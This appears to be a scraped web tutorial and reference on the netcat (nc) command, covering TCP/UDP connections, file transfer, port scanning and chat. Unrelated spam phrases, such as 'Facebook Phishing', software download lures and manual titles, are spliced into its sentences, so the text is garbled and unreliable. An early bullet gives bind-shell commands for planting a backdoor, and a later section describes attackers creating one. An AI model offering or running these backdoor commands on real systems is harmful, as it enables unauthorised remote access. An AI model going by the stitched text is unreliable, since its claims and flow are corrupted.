Netcat is a powerful and versatile network tool that is available for Linux, Mac, and Windows machines. It is simple to use and essential learning for everyone interested in network communication.
The core functionality of Netcat is allowing two computers to connect and share resources. The name is a portmanteau of network and concatenate, which is a fancy word for joining things together.
Connections can be made directly between machines via TCP or UDP ports. Once established there are many potential use cases. Communication can work bidirectionally so files or information can move from listener to client or client to listener.
- If you want to get a reverse shell from windows machine or if you want to plant a backdoor in windows, use this command. Nc –nlvp 4444 –e C: Windows System32. And if you want to get the shell of any linux machine, use this command to start listener mode in linux machine and execute a shell. Facebook Phishing. Nc –nlvp 4444 –e /bin/bash.
- Netcat is a versatile networking tool that can be used to interact with computers using UPD or TCP connections. It can function as a simple file server, simple web server, simple point-to-point chat implementation, a simple port scanner and more.
- Example: 5) NC as a proxy. NC can also be used as a proxy with a simple command. Let’s take an example, $ ncat -l 8080 ncat 192.168.1.200 80. Now all the connections coming to our server on port 8080 will be automatically redirected to 192.168.1.200 server on port 80.
Netcat is known as the IT “Swiss Army Knife” because of its wide range of functionalities. It can be used for simple file sending, chatting, web serving, running code remotely. The list is extensive and varied.
Windows Nc Command Search
How do I use nc to scan Linux, UNIX and Windows server port scanning? If nmap is not installed try nc / netcat command as follow. The -z flag can be used to tell nc to report open ports, rather than initiate a connection. Run nc command with -z flag. You need to specify host name / ip along with the port range to limit and speedup operation. Download this app from Microsoft Store for Windows 10 Mobile, Windows Phone 8.1, Windows Phone 8. See screenshots, read the latest customer reviews, and compare ratings for NFC Commander.
I will highlight some of the more common applications throughout this article.
Notoriously, netcat can be used for creating “back door” access. I will explain how this works, but keep in mind this is no longer part of the nc software due to its potential for malicious use.
Netcat (nc) command examples
Here’s the syntax for the nc command:
The syntax can vary depending on the application, but for most uses, your commands will follow this basic pattern.
Let’s see
1. Create a Connection Using TCP with netcat command
As I mentioned earlier, the core functionality of netcat is joining two machines together. You can set up a connection using TCP to connect two separate machines, you can also emulate that connection using the terminal.
The Listening Machine:
Claves de interpretacion biblica tomas de la fuente pdf free. This command opens port 8080 and tells the machine to begin listening on this port.
In order to establish a connection, you will use another terminal and enter the following.
The Client Machine:
You can also use ‘localhost’ in place of the IP, or use the IP of your second PC here if you are making a remote connection.
That’s it, you have opened a TCP port and established a connection between two systems.
Quick Intro to TCP vs UDP
Why do we use TCP by default? TCP is an older technology than UDP and they operate at different levels of the OSI model. I will give a quick overview of the differences between them and describe some situations where you may choose one over the other.
TCP has strong error-correction capabilities. What does that mean? Basically, this means that while data packets are in transit from system to system, there are continuous tests being performed. These tests make sure that the information from System A is copied accurately to System B. This is a very simplified version of what happens as information travels across networks (the internet).
There are many protocols used in internet communication, though, not just TCP. UDP has different rules than TCP. Neither is necessarily “better” but they can each excel at performing different tasks.
Why would we use UDP over TCP or vice versa? It depends on the application. TCP is slower, but more reliable for transferring data accurately.
UDP can be chosen in situations where speed is more important than reliability transmitting information. One example of this is streaming data, like video. Video can be transferred more quickly over UDP, and even if there are errors in the transmission, they are less likely to impact the user experience.
2. Create a connection using UDP with nc command
The steps for making a UDP connection are virtually identical to the ones we’ve already followed. You will add an option flag to specify that the type of port you want to open is UDP, not the default TCP.
It’s that simple. That’s all you need to do to open UDP port ‘999’.
You might wonder if you can use TCP and UDP with the same port number. You can, because they are separate protocols.
3. Use nc command to transfer files between remote systems
There are other methods for transferring files from one system to another. You can also use the netcat command for this purpose.
For this example, I created a demo that illustrates a remote file transfer from my Linux machine to my MacBook Pro.
Set up the Linux PC to Receive
You begin listening on the receiving machine on TCP port 9999. The ‘
>
‘ tells the machine you are expecting a file to be transferred. Trikaraoke mp3g player. The name that follows is the local name for the file.Set up the Mac PC to Send
The IP address here belongs to the Linux machine. You flip the symbol to ‘
<
‘ and the file ‘toLinux.file’ will be copied onto the remote machine as ‘fromMac.file’.Champ unilift 538 manual. Here’s an example using two different machines to send a file.
4. Use nc command for port scanning
There might be more efficient options for port scanning, but it can be done with netcat. Since netcat comes installed by default on most operating systems, it’s nice to know how to do this if you need to do some quick troubleshooting. You’ll use the ‘-n’ and display verbose output.
This attempts to make a connection to ports between 1-100. Port 80 is HTTP, as I’m sure many of you know. This port is normally open on machines because it is used for connecting to the internet.
When I use this command, I’m actually attempting to connect to all of the ports between 1-100. It successfully connects to port 80, but generates an error message from Apache. I end up with some HTML output on the terminal because my computer sees it as a bad page request.
Zero I/O Mode
To avoid this, you can use the
-z
flag, which stands for zero input/output. This is the built-in port-scanning mode for netcat. I still get the same language, but it does not actually make the connection to port 80 generating the bad request error. Instead it continues through all scanned ports.5. Chat with Netcat
This is a more fun way to use netcat. When you establish a TCP connection like above, you can actually “chat” from machine to machine. It’s less novel in an era where texting and chat applications are ubiquitous but this would have totally blown someone’s mind back in 1996.
Here’s an animation that shows me talking from one terminal to another.
Pretty cool, right?
Bonus Tip: Create a backdoor with nc command
I will show this for demonstration purposes only. Please be aware that unauthorized use of this command could be considered criminal activity in your locale.
In fact, this command no longer does anything with ‘nc’. There are ways to do it, but you will have to find them somewhere else. Once again, this is intended only to show the capability.
The -e flag makes something executable. A common way for malicious actors to gain access is to create such a backdoor on an open port and use that to execute scripts or otherwise manipulate the file system.
So if the attacker somehow gained the access to the “victim” machine, he/she can create a backdoor like this:
Now the attackers can use this backdoor to access into the system remotely and execute commands. So, from attacker’s system:
This enables the attacker to access your computer remotely from the command line. Once connected, I can run bash commands similarly to how I could if I was using the computer directly.
I’m sure you can imagine how someone without the best of intentions could abuse this power. This makes it very important to monitor port activity on any network.
I hope you enjoyed this brief introduction to the netcat command. As always, let us know what you think in the comment section. Vray for 3d max 2017 free download.
Subscribe
Join the conversation. Winimage.
On Unix-like operating systems, the nc command runs Netcat, a utility for sending raw data over a network connection.
This document covers the Linux version of nc.
Description
Netcat is a utility that reads and writesdata across network connections, using the TCP or UDPprotocol. It is designed to be a reliable 'back-end' tool that can be used directly or driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Common uses include:
- Simple TCP proxies
- Shell-script based HTTP clients and servers
- Network daemon testing
- A Socks or HTTP ProxyCommand for ssh
Syntax
Options
-4 | Forces nc to use IPv4 addresses only. |
-6 | Forces nc to use IPv6 addresses only. |
-b | Allow broadcast. |
-C | Send CRLF as line-ending. |
-D | Enable debugging on the socket. |
-d | Do not attempt to read from stdin. |
-h | Prints out nc help. |
-Ilength | Specifies the size of the TCP receive buffer. |
-iinterval | Specifies a delay time interval between lines of text sent and received. Also, causes a delay time between connections to multiple ports. |
-k | Forces nc to stay listening for another connection after its current connection is completed. It is an error to use this option without the -l option. |
-l | Used to specify that nc should listen for an incoming connection rather than initiate a connection to a remote host. It is an error to use this option in conjunction with the -p, -s, or -z options. Additionally, any timeouts specified with the -w option are ignored. |
-n | Do not do any DNS or service lookups on any specified addresses, hostnames or ports. |
-Olength | Specifies the size of the TCP send buffer. |
-Pproxy_username | Specifies a username to present to a proxy server that requires authentication. If no username is specified then authentication will not be attempted. Proxy authentication is only supported for HTTP CONNECT proxies at present. |
-psource_port | Specifies the source port nc should use, subject to privilege restrictions and availability. |
-qseconds | after EOF on stdin, wait the specified number of seconds and then quit. If seconds is negative, wait forever. |
-r | Specifies that source or destination ports should be chosen randomly instead of sequentially within a range or in the order that the system assigns them. |
-S | Enables the RFC 2385 TCP MD5 signature option. |
-ssource | Specifies the IP of the interface that is used to send the packets. For UNIX-domain datagram sockets, specifies the local temporary socket file to create and use so that datagrams can be received. It is an error to use this option in conjunction with the -l option. |
-Ttoskeyword | Change IPv4 TOS value. toskeyword may be one of critical, inetcontrol, lowcost, lowdelay, netcontrol, throughput, reliability, or one of the DiffServ Code Points: ef, af11 . af43, cs0 . cs7; or a number in either hex or decimal. |
-t | Causes nc to send RFC 854 DON'T and WON'T responses to RFC 854 DO and WILL requests. This makes it possible to use nc to script telnet sessions. |
-U | Specifies to use UNIX-domain sockets. |
-u | Use UDP instead of the default option of TCP. For UNIX-domain sockets, use a datagram socket instead of a stream socket. If a UNIX-domain socket is used, a temporary receiving socket is created in /tmp unless the -s flag is given. |
-Vrtable | Set the routing table to be used. The default is 0. |
-v | Have nc give more verbose output. |
-wtimeout | Connections which cannot be established or are idle timeout after timeout seconds. The -w flag has no effect on the -l option, i.e. nc will listen forever for a connection, with or without the -w flag. The default is no timeout. |
-Xproxy_protocol | Requests that nc should use the specified protocol when talking to the proxy server. Supported protocols are '4' (SOCKS v.4), '5' (SOCKS v.5) and 'connect' (HTTPS proxy). If the protocol is not specified, SOCKS version 5 is used. |
-xproxy_address[:port] | Requests that nc should connect to destination using a proxy at proxy_address and port. If port is not specified, the well-known port for the proxy protocol is used (1080 for SOCKS, 3128 for HTTPS). |
-Z | DCCP mode. |
-z | Specifies that nc should only scan for listening daemons, without sending any data to them. It is an error to use this option in conjunction with the -l option. |
destination can be a numerical IP address or a symbolic hostname (unless the -n option is given). In general, a destination must be specified, unless the -l option is given (in which case the local host is used). For UNIX-domain sockets, a destination is required and is the socket path to connect to (or listen on if the -l option is given).
port can be a single integer or a range of ports. Ranges are in the form nn-mm. In general, a destination port must be specified, unless the -U option is given.
Nc Command On Windows
Client/Server model
It is quite simple to build a very basic client/server model using nc. On one console, start nc listening on a specific port for a connection. For example:
Windows Nc Command Center
nc is now listening on port 1234 for a connection. On a second console (or a second machine), connect to the machine and port being listened on:
There should now be a connection between the ports. Anything typed at the second console will be concatenated to the first, and vice-versa. After the connection was set up, nc does not really care which side is being used as a ‘server’ and which side is being used as a ‘client’. The connection may be terminated using an EOF (‘^D’).
There is no -c or -e option in modern netcat, but you still can execute a command after connection being established by redirecting file descriptors. Be cautious here because opening a port and let anyone connected execute arbitrary command on your site is DANGEROUS. If you really need to do this, here is an example:
On ‘server’ side:
On ‘client’ side:
(shell prompt from host.example.com)
By doing this, you create a fifo at /tmp/f and make nc listen at port 1234 of address 127.0.0.1 on ‘server’ side, when a ‘client’ establishes a connection successfully to that port, /bin/sh gets executed on ‘server’ side and the shell prompt is given to ‘client’ side.
When connection is terminated, nc quits as well. Use -k if you want it keep listening, but if the command quits this option won't restart it or keep nc running. Also, don't forget to remove the file descriptor once you don't need it anymore:
Data transfer
The example in the previous section can be expanded to build a basic data transfer model. Any information input into one end of the connection will be output to the other end, and input and output can be easily captured to emulate file transfer.
Start by using nc to listen on a specific port, with output captured into a file:
Using a second machine, connect to the listening nc process, feeding it the file that is to be transferred:
After the file is transferred, the connection will close automatically.
Talking to servers
It is sometimes useful to talk to servers 'by hand' rather than through a user interface. It can aid in troubleshooting, when it might be necessary to verify what data a server is sending in response to commands issued by the client. For example, to retrieve the homepage of a website:
Note that this also displays the headers sent by the web server. They can be filtered, using a tool such as sed, if necessary.
More complicated examples can be built up when the user knows the format of requests required by the server. As another example, an e-mail may be submitted to an SMTP server using:
Port scanning
It may be useful to know which ports are open and running services on a target machine. The -z flag can be used to tell nc to report open ports, rather than initiate a connection. Usually, it's useful to turn on verbose output to stderr by use this option in conjunction with -v option.
For example:
The port range was specified to limit the search to ports 20 - 30, and is scanned by increasing order.
You can also specify a list of ports to scan, for example:
The ports are scanned by the order you given.
Alternatively, it might be useful to know which server software is running, and which versions. This information is often contained in the greeting banners. To retrieve these, it is necessary to first make a connection, and then break the connection when the banner was retrieved. This can be accomplished by specifying a small timeout with the -w flag, or perhaps by issuing a 'QUIT' command to the server:
Examples
Opens a TCP connection to port 42 of host.example.com, using port 31337 as the source port, with a timeout of 5 seconds.
Opens a UDP connection to port 53 of host.example.com.
Opens a TCP connection to port 42 of host.example.com using 10.1.2.3 as the IP for the local end of the connection.
Creates and listens on a UNIX-domain stream socket.
Connects to port 42 of host.example.com via an HTTP proxy at 10.2.3.4, port 8080. This example could also be used by ssh.
The same as the above example, but this time enabling proxy authentication with username 'ruser' if the proxy requires it.
Related commands
ifconfig — View or modify the configuration of network interfaces.